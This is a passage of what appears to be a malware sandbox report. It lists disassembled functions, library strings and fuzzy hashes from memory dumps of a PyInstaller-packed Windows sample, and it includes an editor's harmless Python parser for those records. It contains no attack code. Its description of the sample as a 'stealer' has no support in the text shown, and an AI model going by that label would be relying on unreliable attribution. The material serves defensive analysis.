• String ID: 255.255.255.255$<broadcast>$address family mismatched$unknown address family$unsupported address family$wildcard resolved to multiple address
• API String ID: 3456548859-1715193308
• Opcode ID: e38dd31c2c705093840054c3f6f1944b26c7efcdfc5ee6327c49719d0f116eec
• Instruction ID: 65e6c4555fd344a9a6d5c878a968f485d0cf8163cbec0d09a29e513d0f5baab2
• Opcode Fuzzy Hash: e38dd31c2c705093840054c3f6f1944b26c7efcdfc5ee6327c49719d0f116eec
• Instruction Fuzzy Hash: 7771C5A1A09642C2F7228F35D4C427D23A8FB45B80F60427AFE4E436A5CF3CE566C751
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
• Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
Similarity
• API ID: AddrFreeInfogetaddrinfogetnameinfohtonl
• String ID: $(O)$IPv4 sockaddr must be 2 tuple$Oi:getnameinfo$getnameinfo() argument 1 must be a tuple$getnameinfo(): flowinfo must be 0-1048575.$si|II;getnameinfo(): illegal sockaddr argument$sockaddr resolved to multiple addresses$socket.getnameinfo$surrogatepass
• API String ID: 4001298222-243639936
• Opcode ID: 8c926511a33a684e4fd5c2fa0c2c9a11c5c77bdf7478a1f8c49009de7e57055e
• Instruction ID: 46f627e6f2d3e98e52c617db0687a09f45655bb14a83815ca843865fa8d5f1d5
• Opcode Fuzzy Hash: 8c926511a33a684e4fd5c2fa0c2c9a11c5c77bdf7478a1f8c49009de7e57055e
• Instruction Fuzzy Hash: 03813EB2A09B46C6EB228F31E4C01AD73A8FB84B94F540276EE4D43668DF7CE556C750
APIs
  • Part of subcall function 00007FF72C659390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72C6545F4,00000000,00007FF72C651985), ref: 00007FF72C6593C9
• ExpandEnvironmentStringsW.KERNEL32(?,00007FF72C6586B7,?,?,00000000,00007FF72C653CBB), ref: 00007FF72C65822C
  • Part of subcall function 00007FF72C652810: MessageBoxW.USER32 ref: 00007FF72C6528EA
Strings
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
• String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
• API String ID: 1662231829-930877121
• Opcode ID: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
• Instruction ID: 7ef42902bd1cde71f8c84e3eb85ebb2b6a6ae9d11e0d93f16cb01c3d8ab3ec0a
• Opcode Fuzzy Hash: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
• Instruction Fuzzy Hash: 4B518611A1C64281FA52BB65DC552B9E352FFB87E0FE44831D70E42AD5EE3CE5088F60
Strings
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
• API String ID: 2050909247-1550345328
• Opcode ID: 10ad1ac658e299a32776e4f5c7df64e1b6feaa7ef6c238e08fbfef3a4424164a
• Instruction ID: 7a8256f425ef56693fea974cd6de1fa983b96e23732f8caa7f317c581f33775f
• Opcode Fuzzy Hash: 10ad1ac658e299a32776e4f5c7df64e1b6feaa7ef6c238e08fbfef3a4424164a
• Instruction Fuzzy Hash: 02519061B0864392EA12BB119C111B9A3A2FFA07F4FE44535EE1C07BD6DE3CE5498F60
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
• Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
Similarity
• API ID: 00007F6570
• String ID: ..\s\ssl\ssl_ciph.c$ECDHE-ECDSA-AES128-GCM-SHA256$ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384$ECDHE-ECDSA-AES256-GCM-SHA384$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192$check_suiteb_cipher_list
• API String ID: 118773457-1099454403
• Opcode ID: d010dc04cde0d827dd4d4b2974a89dd33488d398655083e96dacdbd8a206bc00
• Instruction ID: 9a7b53104b96b485d2394a07af2e1a9e2d7d1480de098e5b40ee394ad8e577a6
• Opcode Fuzzy Hash: d010dc04cde0d827dd4d4b2974a89dd33488d398655083e96dacdbd8a206bc00
• Instruction Fuzzy Hash: AB4181F1E1AA0696E7638B34E99037827A2FB54F94F409436DE0DC7694DF2CE5A0C700
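The per-function records above (and the SQLite entries that follow) all share one layout: an APIs list, a Strings list, a Memory Dump Source descriptor naming the dump and the module base it was carved from, the IDA snapshot file, and a Similarity block whose String ID joins the function's referenced strings with "$" and whose Opcode/Instruction hashes are the values you pivot on across reports. Reading hundreds of these by hand is slow, and the strings in them are what tell you which bundled library a given module is (the "LOADER: ... runtime-tmpdir" and "Failed to extract %s" messages are the PyInstaller bootloader's, "Oi:getnameinfo" is CPython's socket module, "ssl_ciph.c"/"check_suiteb_cipher_list" is OpenSSL's libssl, and ".sqlite_master"/"pragma_quick_check" is SQLite). The Python below, an example added by the editor and not part of the report or of Joe Sandbox's tooling, parses that layout into records, strips the "Download File" link text the page extraction fused onto the Associated file names, decodes the dump descriptor, and tags each record with the code base its marker strings point at. Three things in it are assumptions rather than anything the report states: that "$" is purely a separator in String ID (a referenced string containing "$" would be split), the meaning of the dot-separated fields in the .sdmp name (process, stage, dump id, dump address, flags), and the MARKERS table, which is the editor's attribution of strings to libraries. The sample text is constructed from two of the records shown here.

```python
"""Parse Joe Sandbox per-function 'Similarity' records out of report text.
Editor's added example, not part of the report or of Joe Sandbox. Assumptions:
'$' separates strings in String ID; the .sdmp name is
<process>.<stage>.<dump-id>.<address>.<flags...>; MARKERS is the editor's own
attribution of strings to code bases."""
import re
from typing import Dict, List, Optional

SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
BULLET = "\u2022"
RESIDUE = "Download File"  # link text the page extraction fused onto file names
SOURCE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<addr>[0-9A-Fa-f]{16})\.(?P<flags>[0-9A-Fa-f.]+)\.sdmp,\s*Offset:\s*"
    r"(?P<base>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>\w+)"
)
MARKERS = {  # editor's attribution, not a classification the report makes
    "PyInstaller bootloader": ("LOADER: ", "runtime-tmpdir", "Failed to extract %s"),
    "CPython socket module": ("Oi:getnameinfo", "socket.getnameinfo"),
    "OpenSSL libssl": ("ssl_ciph.c", "check_suiteb_cipher_list"),
    "SQLite": (".sqlite_master", "pragma_quick_check"),
}

# Constructed sample in the report's layout: two records, strings abridged.
SAMPLE = """\
APIs
Strings
Memory Dump Source
\u2022 Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
\u2022 Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
Joe Sandbox IDA Plugin
\u2022 Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
Similarity
\u2022 API ID: AddrFreeInfogetaddrinfogetnameinfohtonl
\u2022 String ID: $(O)$IPv4 sockaddr must be 2 tuple$Oi:getnameinfo$socket.getnameinfo
\u2022 Instruction Fuzzy Hash: 03813EB2A09B46C6EB228F31E4C01AD73A8FB84B94F540276EE4D43668DF7CE556C750
APIs
\u2022 ExpandEnvironmentStringsW.KERNEL32(?,00007FF72C6586B7,?,?,00000000,00007FF72C653CBB), ref: 00007FF72C65822C
Strings
Memory Dump Source
\u2022 Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
Similarity
\u2022 API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
\u2022 String ID: %.*s$CreateDirectory$LOADER: failed to expand environment variables in the runtime-tmpdir.$\\
\u2022 Instruction Fuzzy Hash: 4B518611A1C64281FA52BB65DC552B9E352FFB87E0FE44831D70E42AD5EE3CE5088F60
"""


def parse_records(text: str) -> List[Dict]:
    """Split report text into one dict per function record."""
    records: List[Dict] = []
    rec: Optional[Dict] = None
    cur = -1  # index of the section header we are currently under
    for raw in text.splitlines():
        line = raw.strip()  # the page indents every line heavily
        if not line:
            continue
        if line in SECTIONS:
            idx = SECTIONS.index(line)
            if rec is None or idx <= cur:  # header order restarted: new record
                rec = {"apis": [], "strings": [], "associated": [], "fields": {}}
                records.append(rec)
            cur = idx
            continue
        if rec is None or not line.startswith(BULLET):
            continue
        body = line[len(BULLET):].strip()
        if body.endswith(RESIDUE):
            body = body[: -len(RESIDUE)].rstrip()
        section = SECTIONS[cur]
        if section == "APIs":
            rec["apis"].append(body)
        elif section == "Strings":
            rec["strings"].append(body)
        else:
            name, _, value = body.partition(":")  # values may themselves contain ':'
            if name == "Associated":
                rec["associated"].append(value.strip())
            else:
                rec["fields"][name.strip()] = value.strip()
    return records


def parse_source(descriptor: str) -> Dict:
    """Decode the 'Source File' descriptor (field meanings are an assumption)."""
    m = SOURCE.match(descriptor)
    if not m:
        raise ValueError(f"unrecognised source descriptor: {descriptor!r}")
    return {"process": int(m["pid"], 16), "stage": int(m["stage"], 16),
            "dump_id": m["dump"], "dump_address": int(m["addr"], 16),
            "module_base": int(m["base"], 16), "based_on_pe": m["pe"].lower() == "true"}


def split_string_id(value: str) -> List[str]:
    """String ID joins the function's referenced strings with '$' (assumption)."""
    return [s for s in value.split("$") if s]


def classify(rec: Dict) -> List[str]:
    """Name the code bases whose marker strings this function references."""
    strings = split_string_id(rec["fields"].get("String ID", ""))
    return [name for name, needles in MARKERS.items()
            if any(n in s for s in strings for n in needles)]


def summarize(text: str) -> List[Dict]:
    """One flat row per record: where it lives, what it is, and its pivot hash."""
    rows = []
    for rec in parse_records(text):
        src = parse_source(rec["fields"]["Source File"])
        rows.append({"process": src["process"],
                     "module_base": f"0x{src['module_base']:016X}",
                     "components": classify(rec),
                     "instruction_fuzzy_hash": rec["fields"].get("Instruction Fuzzy Hash"),
                     "api_count": len(rec["apis"])})
    return rows


if __name__ == "__main__":
    for row in summarize(SAMPLE):
        print(row)
```

Grouping the rows by module_base gives a quick map of which carved module is the bootloader, which is the CPython socket extension, which is libssl and which is SQLite, so that the handful of functions that are actually the stealer's own logic stand out from the library bulk. The Instruction Fuzzy Hash is kept as an opaque string for exact-match pivoting only; the page does not describe how Joe Sandbox computes it, so no similarity threshold is implied here.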
APIs
Strings
• UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q, xrefs: 00007FFBA67E7B14
• Cannot add a UNIQUE column, xrefs: 00007FFBA67E789C
• cannot add a STORED column, xrefs: 00007FFBA67E7A72
• SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE, xrefs: 00007FFBA67E7C5C
• SELECT raise(ABORT,%Q) FROM "%w"."%w", xrefs: 00007FFBA67E78F7, 00007FFBA67E7973, 00007FFBA67E7A81
• Cannot add a column with non-constant default, xrefs: 00007FFBA67E7969
• Cannot add a PRIMARY KEY column, xrefs: 00007FFBA67E7881
• Cannot add a NOT NULL column with default value NULL, xrefs: 00007FFBA67E790F
• Cannot add a REFERENCES column with non-NULL default value, xrefs: 00007FFBA67E78ED
Memory Dump Source
• Source File: 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFBA6790000, based on PE: true
• Associated: 00000008.00000002.1952109608.00007FFBA6790000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952154128.00007FFBA68F1000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952154128.00007FFBA68F3000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952154128.00007FFBA6908000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952472915.00007FFBA690A000.00000080.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952519785.00007FFBA690C000.00000004.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba6790000_program.jbxd
Similarity
• API ID: 00007B593010
• String ID: Cannot add a NOT NULL column with default value NULL$Cannot add a PRIMARY KEY column$Cannot add a REFERENCES column with non-NULL default value$Cannot add a UNIQUE column$Cannot add a column with non-constant default$SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE$SELECT raise(ABORT,%Q) FROM "%w"."%w"$UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q$cannot add a STORED column
• API String ID: 2201947777-200680935
• Opcode ID: 5b4710b465af85f28d42b2c529d5cd9f71a28c578942a5c84c3729e8c5c3be64
• Instruction ID: 5b48fb79781295ea829a825f609babce88a08958be73fcc2cee4c69132773bef
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b4710b465af85f28d42b2c529d5cd9f71a28c578942a5c84c3729e8c5c3be64
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8DE19CE1A1AB8285EB678B29E5647B963A6FB44FC4F044132CE8D07B95DF3CE459C301
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: OiII$Unknown Bluetooth protocol$iy#
                                                                                                                                                                                                                                  • API String ID: 0-1931379703
                                                                                                                                                                                                                                  • Opcode ID: 4d8043ebe678415ea9796c3876c5d0c2d5509b23804c6fd0dd0e404e45f50446
                                                                                                                                                                                                                                  • Instruction ID: 918caf3a13ef65030926914ba842d2a839050c38d1cbeeab0175b8c0ce086c60
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d8043ebe678415ea9796c3876c5d0c2d5509b23804c6fd0dd0e404e45f50446
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 435195A5A0EA43D2FA164B71E4C407D63A8FF45790F0041B1EE5E436E1EF2DE466C360
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                  • String ID: P%
                                                                                                                                                                                                                                  • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                  • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                  • Instruction ID: c856e71026625c4dcf53e9d161458fe9742495b3ee8c397dc4c6480bcee77c74
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B151E9366047A186D6349F36E4181BAF7A2FBA8B65F404125EFDE43694DF3CD045DB20
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                  • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                  • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                  • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                  • Instruction ID: c43abbecf4a9d3081e3c19240c48d32a48b423849fa415f034b3ea1467b0ae38
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66218821B08A4381E7526B7AFC45179A352FFA8BF0F984531DB1D437D8DE2CD5958B20
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949877226.00007FFBA43D1000.00000040.00000001.01000000.00000018.sdmp, Offset: 00007FFBA43D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949827954.00007FFBA43D0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949877226.00007FFBA43DD000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949877226.00007FFBA43E0000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950013415.00007FFBA43E1000.00000080.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950056718.00007FFBA43E3000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba43d0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 190073905-0
                                                                                                                                                                                                                                  • Opcode ID: 6519944f3013d940d19d1b81a08512331dda30c88b389df6dfaebd19558cce86
                                                                                                                                                                                                                                  • Instruction ID: 9441ac3371657736457b4d9567160e3a1346b34013c137d63ce1b2f33c6b5408
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6519944f3013d940d19d1b81a08512331dda30c88b389df6dfaebd19558cce86
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33818DE1E0EE43D6FA52AB76E4C127966E0AF95780F244875DE0D873B6DE3CE8058700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952893577.00007FFBAA4B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFBAA4B0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952857331.00007FFBAA4B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952893577.00007FFBAA4CB000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952893577.00007FFBAA4D7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1953017597.00007FFBAA4D8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1953052763.00007FFBAA4DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa4b0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 190073905-0
                                                                                                                                                                                                                                  • Opcode ID: cba752f9f13b0038c709412a55bb8b17be48a4cc59ac1a170ee7516abd8a6b31
                                                                                                                                                                                                                                  • Instruction ID: 4acc8f9c5471ca6bdfc2d69daa357b38622d9945180f0441402f1467f83ade77
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cba752f9f13b0038c709412a55bb8b17be48a4cc59ac1a170ee7516abd8a6b31
• Instruction Fuzzy Hash: A2818BE1E0A243D6FA53AF36D4412BAA2A8AF45780F5484B5FD0C47796DF6CF8078620
APIs
Memory Dump Source
• Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
• Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: d50f978ffc6665eb39f9add3952e07e3b3ad5350cb73a1dc24da42246009ca06
• Instruction ID: 815694afbbda7cb0bb81bbaafbd0e94934c8f78a06141646438c914b4e6a5a1c
• Opcode Fuzzy Hash: d50f978ffc6665eb39f9add3952e07e3b3ad5350cb73a1dc24da42246009ca06
• Instruction Fuzzy Hash: D5819FA1E0E603C6F6569B36D4C12BD6398AF46780F5440B9FE0D477A6DE2CE8678720
APIs
Memory Dump Source
• Source File: 00000008.00000002.1949490443.00007FFBA4171000.00000040.00000001.01000000.0000001A.sdmp, Offset: 00007FFBA4170000, based on PE: true
• Associated: 00000008.00000002.1949454231.00007FFBA4170000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000008.00000002.1949490443.00007FFBA41BA000.00000040.00000001.01000000.0000001A.sdmp
• Associated: 00000008.00000002.1949490443.00007FFBA41C8000.00000040.00000001.01000000.0000001A.sdmp
• Associated: 00000008.00000002.1949490443.00007FFBA4217000.00000040.00000001.01000000.0000001A.sdmp
• Associated: 00000008.00000002.1949490443.00007FFBA421C000.00000040.00000001.01000000.0000001A.sdmp
• Associated: 00000008.00000002.1949490443.00007FFBA421F000.00000040.00000001.01000000.0000001A.sdmp
• Associated: 00000008.00000002.1949749489.00007FFBA4220000.00000080.00000001.01000000.0000001A.sdmp
• Associated: 00000008.00000002.1949783531.00007FFBA4222000.00000004.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba4170000_program.jbxd
Similarity
